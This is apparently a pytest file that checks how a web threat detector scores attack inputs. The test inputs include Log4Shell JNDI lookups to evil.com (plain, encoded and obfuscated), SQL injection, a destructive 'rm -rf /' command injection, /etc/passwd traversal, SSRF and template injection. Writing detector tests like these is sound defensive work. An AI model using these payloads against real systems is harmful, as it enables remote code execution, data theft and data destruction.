from flask import Flask, request from security import constants as C from security.threat_detector import ThreatDetector def test_jndi_direct_scores_100(): detector = ThreatDetector() results = detector.scan_input("${jndi:ldap://evil.com/a}", "q") assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results) def test_jndi_encoded_scores_100(): detector = ThreatDetector() results = detector.scan_input("%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D", "q") assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results) def test_jndi_obfuscated_scores_100(): detector = ThreatDetector() payload = "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.com/a}" results = detector.scan_input(payload, "q") assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results) def test_nested_expression_scores_80(): detector = ThreatDetector() results = detector.scan_input("${${env:USER}}", "q") assert any(r.threat_type == C.THREAT_TYPE_NESTED_EXPRESSION and r.score == 80 for r in results) def test_sqli_union_select_scores_90(): detector = ThreatDetector() results = detector.scan_input("UNION SELECT password FROM users", "q") assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results) def test_sqli_or_1_eq_1_scores_90(): detector = ThreatDetector() results = detector.scan_input("a' OR 1=1 --", "q") assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results) def test_xss_scores_70(): detector = ThreatDetector() results = detector.scan_input("", "q") assert any(r.threat_type == C.THREAT_TYPE_XSS and r.score == 70 for r in results) def test_path_traversal_scores_60(): detector = ThreatDetector() results = detector.scan_input("../../etc/passwd", "path") assert any(r.threat_type == C.THREAT_TYPE_PATH_TRAVERSAL and r.score == 60 for r in results) def test_command_injection_scores_85(): detector = ThreatDetector() results = detector.scan_input("test; rm -rf /", "cmd") assert any(r.threat_type == C.THREAT_TYPE_COMMAND_INJECTION and r.score == 85 for r in results) def test_ssrf_scores_75(): detector = ThreatDetector() results = detector.scan_input("http://127.0.0.1/admin", "url") assert any(r.threat_type == C.THREAT_TYPE_SSRF and r.score == 75 for r in results) def test_xxe_scores_85(): detector = ThreatDetector() payload = """ ]>""" results = detector.scan_input(payload, "xml") assert any(r.threat_type == C.THREAT_TYPE_XXE and r.score == 85 for r in results) def test_template_injection_scores_70(): detector = ThreatDetector() results = detector.scan_input("Hello {{ 7*7 }}", "tpl") assert any(r.threat_type == C.THREAT_TYPE_TEMPLATE_INJECTION and r.score == 70 for r in results) def test_sensitive_path_probe_scores_40(): detector = ThreatDetector() results = detector.scan_input("/.git/config", "path") assert any(r.threat_type == C.THREAT_TYPE_SENSITIVE_PATH_PROBE and r.score == 40 for r in results) def test_scan_request_picks_up_args(): app = Flask(__name__) detector = ThreatDetector() with app.test_request_context("/?q=${jndi:ldap://evil.com/a}"): results = detector.scan_request(request) assert any(r.field_name == "args.q" and r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)